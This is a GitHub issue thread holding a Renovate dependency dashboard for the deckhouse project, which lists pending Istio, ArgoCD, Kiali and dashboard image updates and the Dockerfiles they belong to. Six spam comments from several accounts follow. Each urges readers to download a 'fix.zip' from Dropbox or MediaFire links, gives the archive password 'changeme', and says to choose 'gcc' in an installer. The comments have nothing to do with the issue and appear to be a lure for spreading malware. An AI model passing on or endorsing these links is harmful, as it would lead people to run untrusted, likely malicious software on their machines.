### ISSUE TITLE
Dependency Dashboard

### ISSUE THREAD

**Issue by alexey-igrychev** [deckhouse/deckhouse#9481]
This issue lists Renovate updates and detected dependencies. Read the [Dependency Dashboard](https://docs.renovatebot.com/key-concepts/dashboard/) docs to learn more.

## Rate-Limited

These updates are currently rate-limited. Click on a checkbox below to force their creation now.

 - [ ] Update docker.io/istio/proxyv2:1.19.7 Docker digest to bca846c
 - [ ] Update registry.werf.io/werf/werf-argocd-cmp-sidecar:1.2-alpha Docker digest to 342d90e
 - [ ] Update kubernetesui/metrics-scraper Docker tag to v1.0.9
 - [ ] Update docker.io/istio/install-cni Docker tag to v1.23.0
 - [ ] Update docker.io/istio/operator Docker tag to v1.23.0
 - [ ] Update docker.io/istio/pilot Docker tag to v1.23.0
 - [ ] Update docker.io/istio/proxyv2 Docker tag to v1.23.0
 - [ ] Update quay.io/argoproj/argocd Docker tag to v2.12.3
 - [ ] Update quay.io/kiali/kiali Docker tag to v1.89.0
 - [ ] 🔐 **Create all rate-limited PRs at once** 🔐

## Open

These updates have all been created already. Click a checkbox below to force a retry/rebase of any.

 - [ ] [Update docker.io/istio/install-cni:1.16.2 Docker digest to c5814f6](../pull/9479)
 - [ ] [Update docker.io/istio/install-cni:1.19.7 Docker digest to 3b04b3f](../pull/9480)
 - [ ] [Update docker.io/istio/operator:1.19.7 Docker digest to 5b3c7f9](../pull/9561)
 - [ ] [Update docker.io/istio/pilot:1.19.7 Docker digest to e64dda0](../pull/9562)
 - [ ] **Click on this checkbox to rebase all open PRs at once**

## Detected dependencies

<details><summary>dockerfile</summary>
<blockquote>

<details><summary>ee/be/modules/140-user-authz/images/webhook/Dockerfile</summary>

</details>

<details><summary>ee/modules/015-admission-policy-engine/images/trivy-provider/Dockerfile</summary>

</details>

<details><summary>ee/modules/160-multitenancy-manager/images/multitenancy-manager/Dockerfile</summary>

</details>

<details><summary>ee/modules/500-operator-trivy/images/node-collector/Dockerfile</summary>

</details>

<details><summary>ee/modules/500-operator-trivy/images/operator/Dockerfile</summary>

</details>

<details><summary>ee/modules/500-operator-trivy/images/report-updater/Dockerfile</summary>

</details>

<details><summary>ee/modules/500-operator-trivy/images/trivy/Dockerfile</summary>

</details>

<details><summary>ee/se/modules/502-delivery/images/argocd-image-updater/Dockerfile</summary>

 - `registry.werf.io/werf/argocd-image-updater sha256:2037ecef459e1f41010a0ceee95335b5a9d84e5de2d1a29f1b1fdcfa840da9b1`

</details>

<details><summary>ee/se/modules/502-delivery/images/argocd/Dockerfile</summary>

 - `quay.io/argoproj/argocd v2.5.3@sha256:8283a9f06033c2377dc61b03daf4994a3ab961c53d79ed32b9aebadf79bb4858`

</details>

<details><summary>ee/se/modules/502-delivery/images/werf-argocd-cmp-sidecar/Dockerfile</summary>

 - `registry.werf.io/werf/werf-argocd-cmp-sidecar 1.2-alpha@sha256:a3f4273a00e9a63dba40e841739a092e6ab841d0964fde0d44ff1b76bf03021f`

</details>

<details><summary>modules/000-common/images/alpine/Dockerfile</summary>

</details>

<details><summary>modules/015-admission-policy-engine/images/constraint-exporter/Dockerfile</summary>

</details>

<details><summary>modules/015-admission-policy-engine/images/gatekeeper/Dockerfile</summary>

</details>

<details><summary>modules/036-kube-proxy/images/init-container/Dockerfile</summary>

</details>

<details><summary>modules/040-node-manager/images/early-oom/Dockerfile</summary>

</details>

<details><summary>modules/042-kube-dns/images/resolv-watcher/Dockerfile</summary>

</details>

<details><summary>modules/042-kube-dns/images/sts-pods-hosts-appender-init-container/Dockerfile</summary>

</details>

<details><summary>modules/042-kube-dns/images/sts-pods-hosts-appender-webhook/Dockerfile</summary>

</details>

<details><summary>modules/110-istio/images/api-proxy/Dockerfile</summary>

</details>

<details><summary>modules/110-istio/images/cni-v1x16x2/Dockerfile</summary>

 - `docker.io/istio/install-cni 1.16.2@sha256:14255494cf4c78740913c702aa0768fad4b433e82d10cdfc264ef5f30cf041ec`

</details>

<details><summary>modules/110-istio/images/cni-v1x19x7/Dockerfile</summary>

 - `docker.io/istio/install-cni 1.19.7@sha256:94b0b7728cfaeb0595afbcd69aad05f8c4fbda2dbfdbeddb25d12934c0f673b1`

</details>

<details><summary>modules/110-istio/images/kiali/Dockerfile</summary>

 - `quay.io/kiali/kiali v1.67.2@sha256:92fec2b44580519b922d37747114865df4cc4cd51a2fe8342f090c8941e6905d`

</details>

<details><summary>modules/110-istio/images/metadata-exporter/Dockerfile</summary>

</details>

<details><summary>modules/110-istio/images/operator-v1x16x2/Dockerfile</summary>

 - `docker.io/istio/operator 1.16.2@sha256:59f69b479576b9d90fbac96724f94248975cb62b212095ef21cc904511a923f9`

</details>

<details><summary>modules/110-istio/images/operator-v1x19x7/Dockerfile</summary>

 - `docker.io/istio/operator 1.19.7@sha256:f7f371476a2224fe55ff4e7c8b31773e2c048da255bb634075666f88fa7cb990`

</details>

<details><summary>modules/110-istio/images/pilot-v1x16x2/Dockerfile</summary>

 - `docker.io/istio/pilot 1.16.2@sha256:2ddeada2d45f0ce4b328381762612dcb21055ab251dc37993dbc9dcff10aea0e`

</details>

<details><summary>modules/110-istio/images/pilot-v1x19x7/Dockerfile</summary>

 - `docker.io/istio/pilot 1.19.7@sha256:c5feddb54bdc58ddb8b5ed462547b4a673f2b9c5163fe42cec0c0f0115c4c360`

</details>

<details><summary>modules/110-istio/images/proxyv2-v1x16x2/Dockerfile</summary>

 - `docker.io/istio/proxyv2 1.16.2@sha256:e3122850ded1a844bd7d74afafbd3e388221c9e916c4e0ac47af8b644b939871`

</details>

<details><summary>modules/110-istio/images/proxyv2-v1x19x7/Dockerfile</summary>

 - `docker.io/istio/proxyv2 1.19.7@sha256:680eac0faff1835f994ba9047750d7cfe989e868324a933a38d6a6cb80779b33`

</details>

<details><summary>modules/150-user-authn/images/basic-auth-proxy/Dockerfile</summary>

</details>

<details><summary>modules/150-user-authn/images/dex-authenticator/Dockerfile</summary>

</details>

<details><summary>modules/150-user-authn/images/dex/Dockerfile</summary>

</details>

<details><summary>modules/150-user-authn/images/kubeconfig-generator/Dockerfile</summary>

</details>

<details><summary>modules/150-user-authn/images/self-signed-generator/Dockerfile</summary>

</details>

<details><summary>modules/300-prometheus/images/alertmanager/Dockerfile</summary>

</details>

<details><summary>modules/300-prometheus/images/alerts-receiver/Dockerfile</summary>

</details>

<details><summary>modules/300-prometheus/images/mimir/Dockerfile</summary>

</details>

<details><summary>modules/300-prometheus/images/promxy/Dockerfile</summary>

</details>

<details><summary>modules/300-prometheus/images/trickster/Dockerfile</summary>

</details>

<details><summary>modules/301-prometheus-metrics-adapter/images/k8s-prometheus-adapter/Dockerfile</summary>

</details>

<details><summary>modules/301-prometheus-metrics-adapter/images/prometheus-reverse-proxy/Dockerfile</summary>

</details>

<details><summary>modules/340-extended-monitoring/images/cert-exporter/Dockerfile</summary>

</details>

<details><summary>modules/340-extended-monitoring/images/events-exporter/Dockerfile</summary>

</details>

<details><summary>modules/340-extended-monitoring/images/image-availability-exporter/Dockerfile</summary>

</details>

<details><summary>modules/340-monitoring-kubernetes/images/kube-state-metrics/Dockerfile</summary>

</details>

<details><summary>modules/340-monitoring-kubernetes/images/kubelet-eviction-thresholds-exporter/Dockerfile</summary>

</details>

<details><summary>modules/340-monitoring-kubernetes/images/node-exporter/Dockerfile</summary>

</details>

<details><summary>modules/402-ingress-nginx/images/controller-1-10/Dockerfile</summary>

</details>

<details><summary>modules/402-ingress-nginx/images/controller-1-6/Dockerfile</summary>

</details>

<details><summary>modules/402-ingress-nginx/images/controller-1-9/Dockerfile</summary>

</details>

<details><summary>modules/402-ingress-nginx/images/protobuf-exporter/Dockerfile</summary>

</details>

<details><summary>modules/462-loki/images/loki/Dockerfile</summary>

</details>

<details><summary>modules/500-dashboard/images/dashboard/Dockerfile</summary>

 - `kubernetesui/dashboard v2.7.0@sha256:2e500d29e9d5f4a086b908eb8dfe7ecac57d2ab09d65b24f588b1d449841ef93`

</details>

<details><summary>modules/500-dashboard/images/metrics-scraper/Dockerfile</summary>

 - `kubernetesui/metrics-scraper v1.0.6@sha256:1f977343873ed0e2efd4916a6b2f3075f310ff6fe42ee098f54fc58aa7a28ab7`

</details>

<details><summary>modules/500-openvpn/images/easyrsa-migrator/Dockerfile</summary>

</details>

<details><summary>modules/500-openvpn/images/pmacct/Dockerfile</summary>

</details>

<details><summary>tools/dev_images/Dockerfiles/Dockerfile.BASE_ALPINE</summary>

</details>

<details><summary>tools/dev_images/Dockerfiles/Dockerfile.BASE_ALT</summary>

</details>

<details><summary>tools/dev_images/Dockerfiles/Dockerfile.BASE_GOLANG_16_ALPINE</summary>

</details>

<details><summary>tools/dev_images/Dockerfiles/Dockerfile.BASE_GOLANG_17_ALPINE</summary>

</details>

<details><summary>tools/dev_images/Dockerfiles/Dockerfile.BASE_GOLANG_18_ALPINE</summary>

</details>

<details><summary>tools/dev_images/Dockerfiles/Dockerfile.BASE_GOLANG_19_ALPINE</summary>

</details>

<details><summary>tools/dev_images/Dockerfiles/Dockerfile.BASE_GOLANG_19_BULLSEYE</summary>

</details>

<details><summary>tools/dev_images/Dockerfiles/Dockerfile.BASE_GOLANG_20_ALPINE</summary>

</details>

<details><summary>tools/dev_images/Dockerfiles/Dockerfile.BASE_GOLANG_20_BULLSEYE</summary>

</details>

<details><summary>tools/dev_images/Dockerfiles/Dockerfile.BASE_GOLANG_21_ALPINE</summary>

</details>

<details><summary>tools/dev_images/Dockerfiles/Dockerfile.BASE_GOLANG_21_BULLSEYE</summary>

</details>

<details><summary>tools/dev_images/Dockerfiles/Dockerfile.BASE_GOLANG_22_ALPINE</summary>

</details>

<details><summary>tools/dev_images/Dockerfiles/Dockerfile.BASE_GOLANG_22_BULLSEYE</summary>

</details>

<details><summary>tools/dev_images/Dockerfiles/Dockerfile.BASE_GOLANG_ALPINE</summary>

</details>

<details><summary>tools/dev_images/Dockerfiles/Dockerfile.BASE_NODE_18_ALPINE</summary>

</details>

<details><summary>tools/dev_images/Dockerfiles/Dockerfile.BASE_NODE_20_ALPINE</summary>

</details>

<details><summary>tools/dev_images/Dockerfiles/Dockerfile.BASE_UBUNTU</summary>

</details>

</blockquote>
</details>

**Comment by GendiAstaNugraha** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by GendiAstaNugraha** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by GendiAstaNugraha** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by GendiAstaNugraha** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by swaggy111** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by NaiveShiki** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."
